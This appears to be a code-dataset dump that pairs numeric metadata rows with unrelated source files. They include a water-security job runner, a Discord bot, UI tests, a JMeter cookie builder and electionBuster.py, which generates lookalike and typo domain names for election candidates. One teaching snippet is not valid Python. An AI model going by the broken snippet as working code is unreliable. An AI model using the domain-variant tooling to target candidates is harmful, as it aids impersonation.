0.029467
0
0
0
0
0
0
1
0.194915
false
0
0.050847
0.084746
0.449153
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99b7f2669bc39124ccbb858ced46317dfc7b5280
7,789
py
Python
packages/dinesti/python/_grab.py
USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
3
2019-06-10T18:04:14.000Z
2020-12-05T18:11:40.000Z
packages/dinesti/python/_grab.py
USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
null
null
null
packages/dinesti/python/_grab.py
USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
2
2020-09-24T19:04:14.000Z
2020-12-05T18:11:43.000Z
# Copyright (2013) Sandia Corporation. Under the terms of Contract # DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government # retains certain rights in this software. # # This software is released under the FreeBSD license as described # in License.txt import time import string import subprocess import os import tempfile from multiprocessing import Process import _gui from _gui import FakeFile import json # Python 2.6 or later def createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix): file = tempfile.NamedTemporaryFile(delete=False, suffix='.yml') _gui.writeLine(file,"# written using dinesti web gui") _gui.writeLine(file,"") _gui.writeLine(file,"network:") _gui.writeLine(file," epanet file: " + fINP.name) #_gui.writeLine(file," wqm file: " + fWQM.name) # moved to grabsample section #_gui.writeLine(file," hydraulic timestep: None") # no longer available _gui.writeLine(file," water quality timestep: None") _gui.writeLine(file," simulation duration: None") _gui.writeLine(file,"") _gui.writeLine(file,"scenario:") # used to be called 'events' _gui.writeLine(file," scn file: " + fSCN.name) # for _inversion LP (optimization) _gui.writeLine(file," tsg file: " + fTSG.name) # for _inversion STEP (optmization) _gui.writeLine(file," ignore merlion warnings: False") # moved from network section _gui.writeLine(file,"") #_gui.writeLine(file,"solver:") #_gui.writeLine(file," cplex:") #_gui.writeLine(file," mipgap: 0.02") #_gui.writeLine(file," threads: 1") _gui.writeLine(file,"") #_gui.writeLine(file,"samplelocation:") _gui.writeLine(file,"grabsample:") _gui.writeLine(file," wqm file: " + fWQM.name) # moved from network section _gui.writeLine(file," model format: PYOMO") # AMPL or PYOMO _gui.writeLine(file," sample time: " + str(dSampleTime / 60)) # minutes _gui.writeLine(file," threshold: 0.01") # default = 0.001 _gui.writeLine(file," fixed sensor file: " + fSEN.name) #_gui.writeLine(file," not allowed locations file: None") # no 
longer available _gui.writeLine(file," allowed locations file: " + fNodes.name) # TODO _gui.writeLine(file," N samples: " + str(nSampleCount)) # default = 3 _gui.writeLine(file," greedy selection: True") _gui.writeLine(file,"") _gui.writeLine(file,"configure:") _gui.writeLine(file," ampl executable: ampl")#" + sInstallDir + "bin/ampl") _gui.writeLine(file," pyomo executable: pyomo")#" + sInstallDir + "bin/pyomo") _gui.writeLine(file," output prefix: " + sOutputPrefix) _gui.writeLine(file,"") #_gui.writeLine(file,"internal:") #_gui.writeLine(file," nodeNames: None") #_gui.writeLine(file," nodeIndices: None") return file def createInpFile(data): text = _gui.getFile(data["docId"], data["fileName"]) temp = tempfile.NamedTemporaryFile(delete=False, suffix='.inp') temp.write(text) return temp def createScnFile(uuid): return FakeFile() def createTsgFile(uuid): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.tsg') data = _gui.getView("m_ScenariosList?key=\"" + uuid + "\"") for row in data["rows"]: text = _gui.getFile(row["id"], row["value"]["fileName"]) temp.write(text + "\n") return temp def createSenFile(uuid): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.sen') doc = _gui.getDoc(uuid) sensors = _gui.getValue(doc, "sensors", "") sensors = sensors.split("\n") bFirst = True for line in sensors: s = line.strip() if len(s) > 0: if not bFirst: temp.write("\n") bFirst = False temp.write(s) return temp def createNodesFile(Nodes): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.nodes') for node in Nodes: temp.write(node + "\n") return temp def runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix): nStart = time.time() sInstallDir = _gui.getInstallDir() args = [sInstallDir + "python/bin/wst", "grabsample", fYML.name] # p = subprocess.Popen(args, stdout=subprocess.PIPE) doc = _gui.getDoc(sUuid) sampleTime = doc.get("sampleTime") inp_info = doc.get("docFile_INP") duration = inp_info.get("duration") bErrorOverTime = False if 
sampleTime <> None and duration <> None: if sampleTime > duration: bErrorOverTime = True doc["pid"] = str(p.pid) doc["status"] = "Running" res = _gui.setDoc(doc) #doc = _gui.getDoc(sUuid) com = p.communicate() sOut = com[0] # sFile = sOutputPrefix + "_grabsample_results.json" results = _gui.readJsonFile(sFile, {"Error": "output file was not created: " + sFile}) sOUT = sOutputPrefix + "_samplelocation.out" debug_text_out_file = _gui.readFile(sOUT) doc = _gui.getDoc(sUuid) bError = False if bErrorOverTime: sError = "the sample time is after the end of the simulation." results = {"Error": sError} doc["Error"] = sError bError = True elif results.get("Error") <> None: doc["Error"] = results["Error"] bError = True doc["results"] = results doc["results"]["sampleTime"] = results.get("sampleTime", 0) * 60 # TODO - this should be changed in the grabsample executable doc["debug_fileSCN"] = fSCN.name doc["debug_fileTSG"] = fTSG.name doc["debug_stdout"] = com[0] doc["returnCode"] = p.returncode doc["debug_text_out_file"] = debug_text_out_file # if com[1] == None: doc["debug_stderr"] = "\0" else: doc["debug_stderr"] = com[1] # sKill = "Signal handler called from" index = string.find(sOut, sKill) doc["debug_stdout_find_error_index"] = index # if _gui.bDeleteTempFiles(override=None): _gui.removeFiles([fWQM, fTSG, fSCN, fINP, fSEN, fNodes, fYML]) _gui.removeFile(sOutputPrefix + "_epanet.rpt") _gui.removeFile(sOutputPrefix + "_samplelocation.out") _gui.removeFile(sOutputPrefix + "_samplelocation.log") _gui.removeFile(sOutputPrefix + "_MERLION_LABEL_MAP.txt") _gui.removeFile(sOutputPrefix + "_GSP.dat") _gui.removeFile(sOutputPrefix + "_ampl.run") _gui.removeFile(sOutputPrefix + "_ampl.out") _gui.removeFile(sOutputPrefix + "_grabsample_results.dat") _gui.removeFile(sOutputPrefix + "_grabsample_results.json") # if index == -1 and p.returncode == 0: doc["status"] = "Complete" elif index == -1 or bError: doc["status"] = "Error" else: doc["status"] = "Stopped" # doc["timer"] = time.time() 
- nStart _gui.setDoc(sUuid, doc) return doc def runThreaded(doc, sOutputPrefix, bThreaded=True): sUuid = doc["_id"] dSampleTime = doc.get("sampleTime", 0) nSampleCount = doc.get("sampleCount", 3) docFile_INP = doc.get("docFile_INP") Nodes = doc.get("Nodes" ) fWQM = _gui.createWqmFile(docFile_INP) if fWQM == None: fINP = createInpFile(docFile_INP) fWQM = FakeFile() else: fINP = FakeFile() fSCN = createScnFile(sUuid) # FakeFile fTSG = createTsgFile(sUuid) fSEN = createSenFile(sUuid) if Nodes == None: fNodes = FakeFile() else: fNodes = createNodesFile(Nodes) fYML = createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix) _gui.closeFiles([fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML]) # if bThreaded: p = Process(target=runWst, args=(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix, )) p.start() else: return runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix) return def run(sCall, sUuid, bThreaded=True): if sCall == "delete": return False if sCall == "rename": return False sDir = tempfile.gettempdir() os.chdir(sDir) doc = _gui.getDoc(sUuid) runThreaded(doc, sUuid, True) return _gui.respondJSON(json.dumps({})) def main(): _gui.setHost() for req in _gui.getRequests(): sDb = _gui.getQuery(req, "db") _gui.setDatabase(sDb) sCall = _gui.getQuery(req, "call") sUuid = _gui.getQuery(req, "uuid") bRetVal = run(sCall, sUuid, True) if bRetVal: continue _gui.respondJSON(json.dumps({})) if __name__ == "__main__": main()
7,789
7,789
0.705867
999
7,789
5.374374
0.269269
0.087167
0.116223
0.01788
0.196685
0.172658
0.122369
0.070404
0.056994
0.048054
0
0.00646
0.145462
7,789
1
7,789
7,789
0.80018
0.993966
0
0.117021
0
0
0.177388
0.021644
0
0
0
1
0
0
null
null
0
0.047872
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
null
0
0
1
0
1
0
0
0
0
0
0
0
0
6
99b9d977ad5ba85f80dfdf899e7e306d68769703
246
py
Python
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
1
2021-05-11T16:22:00.000Z
2021-05-11T16:22:00.000Z
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
null
null
null
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
null
null
null
from discord.ext import commands from configparser import ConfigParser parser = ConfigParser() parser.read("config.txt") TOKEN = parser.get('config', 'token') bot = commands.Bot(command_prefix='!') bot.load_extension("Webhook") bot.run(TOKEN)
20.5
38
0.760163
32
246
5.78125
0.59375
0.194595
0
0
0
0
0
0
0
0
0
0
0.097561
246
11
39
22.363636
0.833333
0
0
0
0
0
0.117886
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99b9dbb04990991f85b416338b39b80cb298f798
567
py
Python
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
from components.ghost.blogPage import BlogPage from components.ghost.adminPanelPage import AdminPanelPage class TestBlogPage(BlogPage): def test_01_open_blog_page(self): self.go_to() assert self.get_title() == "Blog for Testing" class TestAdminPanelPage(AdminPanelPage): def test_01_open_admin_panel_page(self): self.go_to() assert self.is_log_in_required() def test_02_log_in_to_admin_panel(self): self.go_to() self.log_in_as_admin() assert not self.is_log_in_required() self.logOut()
27
58
0.714286
78
567
4.833333
0.423077
0.05305
0.079576
0.095491
0.228117
0.137931
0.137931
0
0
0
0
0.013274
0.202822
567
20
59
28.35
0.820796
0
0
0.2
0
0
0.028219
0
0
0
0
0
0.2
1
0.2
false
0
0.133333
0
0.466667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ba4295d40e9eb27422490957fc057fa213b493
1,038
py
Python
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
1
2020-03-25T17:39:10.000Z
2020-03-25T17:39:10.000Z
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
null
null
null
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
4
2017-01-21T15:16:55.000Z
2020-03-28T17:43:47.000Z
""" { 'type': 'user', 'user_id': (encrypted user id), 'name': (first name), 'review_count': (review count), 'average_stars': (floating point average, like 4.31), 'votes': {(vote type): (count)}, 'friends': [(friend user_ids)], 'elite': [(years_elite)], 'yelping_since': (date, formatted like '2012-03'), 'compliments': { (compliment_type): (num_compliments_of_this_type), ... }, 'fans': (num_fans), } """ import json def main(f, o): with open(f, 'r') as fp: res = [] out = open(o, 'w') for u in fp.read().splitlines(): user = json.loads(u) d = {} d['_id'] = user['user_id'] d['name'] = user['name'] d['review_count'] = user['review_count'] d['friends_count'] = len(user['friends']) res.append(json.dumps(d)) out.write('[' + ',\n'.join(res) + ']') out.close() if __name__ == '__main__': main('../dataset/user.json', '../dataset/out.json')
25.95
58
0.504817
122
1,038
4.090164
0.52459
0.088176
0.04008
0
0
0
0
0
0
0
0
0.012129
0.285164
1,038
39
59
26.615385
0.660377
0.44316
0
0
0
0
0.203509
0
0
0
0
0
0
1
0.058824
false
0
0.058824
0
0.117647
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bb6a49211d151c035db736f93150d9bd8b0d82
5,085
py
Python
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
# NanoSciTracker - 2020 # Author: Luis G. Leon Vega <luis@luisleon.me> # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # This project was sponsored by CNR-IOM import copy import cv2 as cv import LocalTracker.detector as Detector import LocalTracker.drawutils as DrawUtils import LocalTracker.tracker as Tracker import LocalTracker.matcher as DetectionMatcher import Matcher.matcher as FeatureMatcher class Scene: def __init__( self, ROI=None, overlap=0, detection_sampling=3, detection_roi=None, settings=None ): # Get coordinates self.roi = ROI x, y = self.roi self.x0, self.x1 = x self.y0, self.y1 = y self.w = self.x1 - self.x0 self.h = self.y1 - self.y0 self.overlap = overlap self.frame = None # ROIs if detection_roi is None: self.detection_roi = ( self.overlap, self.overlap, self.w - self.overlap, self.h - self.overlap, ) else: self.detection_roi = detection_roi # BBs self.trackers = [] self.detections = [] self.new_detections = [] self.trackers_new_detections = [] self.trackers_out_scene = [] self.dead_trackers = [] # Settings self._settings = settings if settings is None: raise RuntimeError("Scene settings are not valid") self.batches = self._settings.set_if_defined("batches", 2) self.grayscale = self._settings.set_if_defined("grayscale", True) 
self.world_size = self._settings.set_if_defined("world_size", None) self.counter = 0 self.detection_sampling = detection_sampling def load_frame(self, frame): self.frame = frame def detect(self, gray_frame): padding = self._settings.set_if_defined("padding", None) return Detector.detect(gray_frame, self.batches, padding=padding) def track(self, colour_frame): Tracker.updateTrackers(colour_frame, self.trackers, ROI=self.detection_roi) return Tracker.retrieveBBs(self.trackers) def update(self, colour_frame=None): if not colour_frame is None: self.frame = colour_frame gray_detect = cv.cvtColor(self.frame, cv.COLOR_BGR2GRAY) # Perform detections and filter the new ones if self.counter % self.detection_sampling == 0: self.detections = self.detect(gray_detect) self.new_detections = DetectionMatcher.inter_match( self.detections, self.trackers ) # Deploy new trackers accordingly self.trackers_new_detections = Tracker.deployTrackers( self.frame, self.new_detections, self.trackers, ROI=self.detection_roi, offset=(self.x0, self.y0), grayscale=self.grayscale, world_size=self.world_size, ) else: self.new_detections = [] self.trackers_new_detections = [] # Perform tracking update self.track(self.frame) # Catch trackers which went out of scene self.trackers_out_scene = Tracker.retrieveOutScene(self.trackers) self.dead_trackers = Tracker.retrieveDeadTrackers(self.trackers) self.counter += 1 return ( self.trackers, self.trackers_out_scene, self.trackers_new_detections, self.dead_trackers, ) def draw(self, colour_frame): """ Purple: New detections Red: Detections Blue: Trackers Light blue: Out of scene """ colour_copy = copy.deepcopy(colour_frame) # Draw detections colour_copy = DrawUtils.draw_detections( colour_copy, self.new_detections, (255, 0, 255) ) colour_copy = DrawUtils.draw_detections( colour_copy, self.detections, (0, 0, 255) ) # Draw trackers colour_copy = DrawUtils.draw_trackers(colour_copy, self.trackers, (255, 0, 0)) colour_copy = DrawUtils.draw_trackers( colour_copy, 
self.trackers_out_scene, (255, 255, 0) ) return colour_copy
33.019481
86
0.627139
594
5,085
5.227273
0.296296
0.0657
0.027375
0.032206
0.171337
0.111433
0.091465
0.064412
0.034138
0
0
0.013943
0.294789
5,085
153
87
33.235294
0.851924
0.223992
0
0.121212
0
0
0.01577
0
0
0
0
0
0
1
0.060606
false
0
0.070707
0
0.181818
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bbb76447ce3721bfcbb6a8e1979553d2d5700b
310
py
Python
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
10
2020-09-28T12:14:31.000Z
2021-09-22T18:38:13.000Z
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
5
2020-09-28T13:40:52.000Z
2021-12-06T16:38:09.000Z
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
5
2020-09-28T13:10:45.000Z
2021-12-06T16:05:16.000Z
from abc import ABC, abstractmethod class Shape(ABC): @abstractmethod def calculate_area(self): pass @abstractmethod def draw(self): pass class Rectangle(Shape): def __init__(self, ...): ... def calculate_area(self): # concrete implementation here
15.5
38
0.619355
32
310
5.8125
0.53125
0.182796
0.172043
0.215054
0
0
0
0
0
0
0
0
0.287097
310
19
39
16.315789
0.841629
0.090323
0
0.5
0
0
0
0
0
0
0
0
0
0
null
null
0.166667
0.083333
null
null
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
3
99bc36674ac9930132b7fa40a1504d6148e42d4d
7,573
py
Python
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
11
2020-03-22T13:30:21.000Z
2021-12-25T06:23:44.000Z
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
37
2019-12-18T13:12:50.000Z
2022-02-10T10:52:37.000Z
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
5
2019-12-06T10:55:56.000Z
2020-06-01T19:32:32.000Z
import logging from typing import List, Optional from enum import Enum from xml.etree.ElementTree import Element from jmeter_api.basics.config.elements import BasicConfig from jmeter_api.basics.utils import Renderable, FileEncoding, tree_to_str class CookiePolicy(Enum): STANDARD = 'standard' STANDARD_STRICT = 'standard-strict' IGNORE = 'ignoreCookies' NETSCAPE = 'netscape' DEFAULT = 'default' RFC2109 = 'rfc2109' RFC2965 = 'RFC2965' BEST_MATCH = 'best-match' class Cookie(Renderable): TEMPLATE = 'cookie.xml' root_element_name = 'elementProp' def __init__(self, *, name: str, value: str, domain: str = '', path: str = '', secure: bool = False, expires: int = 0, path_specified: bool = True, domain_specified: bool = True): self.name = name self.value = value self.domain = domain self.path = path self.secure = secure self.expires = expires self.path_specified = path_specified self.domain_specified = domain_specified @property def name(self) -> str: return self._name @name.setter def name(self, value): if not isinstance(value, str): raise TypeError( f'name must be str. {type(value).__name__} was given') self._name = value @property def value(self) -> str: return self._value @value.setter def value(self, value): if not isinstance(value, str): raise TypeError( f'value must be str. {type(value).__name__} was given') self._value = value @property def domain(self) -> str: return self._domain @domain.setter def domain(self, value): if not isinstance(value, str): raise TypeError( f'domain must be str. {type(value).__name__} was given') self._domain = value @property def path(self) -> str: return self._path @path.setter def path(self, value): if not isinstance(value, str): raise TypeError( f'path must be str. {type(value).__name__} was given') self._path = value @property def expires(self) -> str: return self._expires @expires.setter def expires(self, value): if not isinstance(value, int): raise TypeError( f'expires must be int. 
{type(value).__name__} was given') self._expires = str(value) @property def secure(self) -> str: return self._secure @secure.setter def secure(self, value): if not isinstance(value, bool): raise TypeError( f'secure must be bool. {type(value).__name__} was given') self._secure = str(value).lower() @property def path_specified(self) -> str: return self._path_specified @path_specified.setter def path_specified(self, value): if not isinstance(value, bool): raise TypeError( f'path_specified must be bool. {type(value).__name__} was given') self._path_specified = str(value).lower() @property def domain_specified(self) -> str: return self._domain_specified @domain_specified.setter def domain_specified(self, value): if not isinstance(value, bool): raise TypeError( f'domain_specified must be bool. {type(value).__name__} was given') self._domain_specified = str(value).lower() def to_xml(self) -> str: xml_tree: Optional[Element] = super().get_template() element_root = xml_tree.find(self.root_element_name) element_root.attrib['name'] = self.name element_root.attrib['testname'] = self.name for element in list(element_root): try: if element.attrib['name'] == 'Cookie.value': element.text = self.value elif element.attrib['name'] == 'Cookie.domain': element.text = self.domain elif element.attrib['name'] == 'Cookie.path': element.text = self.path elif element.attrib['name'] == 'Cookie.secure': element.text = self.secure elif element.attrib['name'] == 'Cookie.expires': element.text = self.expires elif element.attrib['name'] == 'Cookie.path_specified': element.text = self.path_specified elif element.attrib['name'] == 'Cookie.domain_specified': element.text = self.domain_specified except KeyError: logging.error( f'Unable to properly convert {self.__class__} to xml.') return tree_to_str(xml_tree) class HTTPCookieManager(BasicConfig, Renderable): root_element_name = 'CookieManager' def __init__(self, *, cookies: List[Cookie] = [], clear_each_iter: bool = False, policy: CookiePolicy = 
CookiePolicy.STANDARD, name: str = 'HTTP Cookie Manager', comments: str = '', is_enabled: bool = True): self.cookies = cookies self.policy = policy self.clear_each_iter = clear_each_iter super().__init__(name=name, comments=comments, is_enabled=is_enabled) @property def policy(self): return self._policy @policy.setter def policy(self, value): if not isinstance(value, CookiePolicy): raise TypeError( f'policy must be CookiePolicy. {type(value).__name__} was given') self._policy = value @property def clear_each_iter(self) -> str: return self._clear_each_iter @clear_each_iter.setter def clear_each_iter(self, value): if not isinstance(value, bool): raise TypeError( f'clear_each_iter must be bool. {type(value).__name__} was given') self._clear_each_iter = str(value).lower() @property def cookies(self) -> str: return self._cookies @cookies.setter def cookies(self, value): if not isinstance(value, List): raise TypeError( f'arguments must be List. {type(value).__name__} was given') for el in value: if not isinstance(el, Cookie): raise TypeError( f'arguments must contain only Cookie. {type(value).__name__} was given') self._cookies = value def to_xml(self) -> str: element_root, xml_tree = super()._add_basics() for element in list(element_root): try: if element.attrib['name'] == 'CookieManager.cookies': element.text = '' for arg in self.cookies: element.text += arg.to_xml() elif element.attrib['name'] == 'CookieManager.clearEachIteration': element.text = self.clear_each_iter except KeyError: logging.error( f'Unable to properly convert {self.__class__} to xml.') if not self.policy is CookiePolicy.STANDARD: el = Element('stringProp', attrib={'name': 'CookieManager.policy'}) el.text = str(self.policy.value) element_root.append(el) return tree_to_str(xml_tree)
32.502146
88
0.575201
832
7,573
5.032452
0.127404
0.032243
0.02866
0.05732
0.433962
0.318128
0.238357
0.21925
0.21925
0.17005
0
0.003333
0.326555
7,573
232
89
32.642241
0.817647
0
0
0.242268
0
0
0.152119
0.047669
0
0
0
0
0
1
0.134021
false
0
0.030928
0.056701
0.304124
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc394d69ac0c2ddde0ba6fd63c903bf2c13144
13,338
py
Python
electionBuster.py
RarW0lf/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
16
2015-10-22T01:37:28.000Z
2018-10-17T13:05:44.000Z
electionBuster.py
RarW0lf/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
2
2018-02-10T00:05:43.000Z
2018-05-17T22:48:22.000Z
electionBuster.py
thorshand/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
4
2017-08-02T12:41:44.000Z
2018-08-14T16:16:41.000Z
#!/usr/bin/python3.5 ################################################## ## Author: Joshua Franklin, Kevin Franklin ## Example input to start: ## sudo ./electionBuster.py -f josh -l franklin -y 2014 -e senate -s pennsyltucky ## 6 arguments are passed: ## 1: The first name of the candidate (mandatory) ## 2: The middle name of the candidate (optional) ## 2: The last name of the candidate (mandatory) ## 3: The year of the election (mandatory) ## 4: The type of race, such as congress, senate, or president. (mandatory) ## 5: The state or region the candidate is from (optional) ################################################## #TODO: Add a keyboard interrupt import requests import sys import time import string import argparse import socket from datetime import date import urllib from multiprocessing import Pool as ThreadPool, Manager import collections import csv import operator from modules.utils import genAllDonate,genAll,generate_urls, tryURLforReal from modules.text_tools import alphabet,alt_alphabets,skipLetter,stringAndStrip,removeDups,reverseLetter,wrongVowel,tlds confirmedURLs = Manager().list() allURLS = Manager().list() class NameDenormalizer(object): def __init__(self, filename=None): filename = filename or 'names.csv' lookup = collections.defaultdict(list) with open(filename) as f: reader = csv.reader(f) for line in reader: matches = set(line) for match in matches: lookup[match].append(matches) self.lookup = lookup def __getitem__(self, name): name = name.upper() if name not in self.lookup: raise KeyError(name) return self.lookup[name] def get(self, name, default=None): try: return self[name] except KeyError: return set( [name] ) # Program Timer start_time = time.time() # Function: casts and removes those pesky \r and \n #Parse command line arguments parser = argparse.ArgumentParser(description='Identifies registered candidate domains') parser.add_argument('-f','--firstName', help='Candidate\'s first name',required=True) 
parser.add_argument('-m','--middleName',help='Candidate\'s optional middle name') parser.add_argument('-l','--lastName',help='Candidate\'s last name', required=True) parser.add_argument('-y','--year', help='Year of the election',required=True) parser.add_argument('-e','--electionType',help='Type of election (congress, senate, president)', required=True) parser.add_argument('-s','--state', help='Candidate\'s state of origin', action='append' ) #Exists for candidates like Mitt Romney that possibly have an attachment to two states (i.e., Utah, Massachusetts) parser.add_argument('-a','--aliasFileName', help='Filename containing a list of aliases') parser.add_argument('-p','--party', help='Party Affiliation') args = parser.parse_args() # Stores command line argumetns # Make all lowercase fName = args.firstName fName = fName.lower() lName = args.lastName lName = lName.lower() party = "" year = args.year shortYear = year[-2:] electionType = args.electionType electionType = electionType.lower() state = [] stateText = "" if (args.party) : party = args.party fileName = "states.csv" if (args.aliasFileName) : fileName = stringAndStrip( args.aliasFileName) if (args.state) : nd = NameDenormalizer( fileName ) for aState in args.state: stateText = stateText + aState.lower() state.append( stringAndStrip( aState.upper( ) ) ) statenick = list( nd.get( aState.upper() ) ) for s1 in statenick: for s in s1: state.append( s ) mName = "" middleInitial = "" if (args.middleName) : mName = args.middleName mName = mName.lower() middleInitial = mName[0] # This assigns the position variable if (electionType == 'congress') or (electionType == 'congressional') : position = 'congress' altPosition = 'congressman' # congresswoman?? 
elif electionType == 'senate' : position = 'senator' altPosition = 'senate' elif (electionType == 'governor') or (electionType == 'gubernatorial'): position = 'governor' altPosition = 'gov' elif (electionType == 'president') or (electionType == 'presidential') : position = 'president' altPosition = 'prez' elif (electionType == 'mayoral') or (electionType == 'mayor') : position = 'mayor' altPosition = 'mayoral' else : position = electionType altPosition = electionType # top-level domain-names # # consider removing .me, .info, and .biz if they aren't adding value # Runs stringAndStrip on everything except fileName b/c that's used elsewhere fName = stringAndStrip(fName) lName = stringAndStrip(lName) year = stringAndStrip(year) electionType = stringAndStrip(electionType) # Alerting the users to the types of sites we're expecting to find # This differs at times since the state variable isn't mandatory to run the script ## Consider deleting this - does it actually provide value? if (args.state) : print('We expect to find these URLs excluding subtle variances:') print('http://www.' + fName + lName + '.com') print('http://www.' + lName + fName + '.com') print('http://www.' + fName + year + '.com') print('http://www.' + lName + year + '.com') print('http://www.' + fName + lName + year + '.com' ) for stateAlias in state: print('http://www.' + fName + lName + 'for' + stateAlias + '.com') print('http://www.' + lName + 'for' + stateAlias + '.com') print('http://www.' + fName + 'for' + stateAlias + '.com') print('http://www.' + fName + lName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + year + '.com') print('http://www.' + position + fName + lName + '.com') else : print('We expect to find these URLs excluding subtle variances:') print('http://www.' + fName + lName + '.com') print('http://www.' + lName + fName + '.com') print('http://www.' + fName + year + '.com') print('http://www.' 
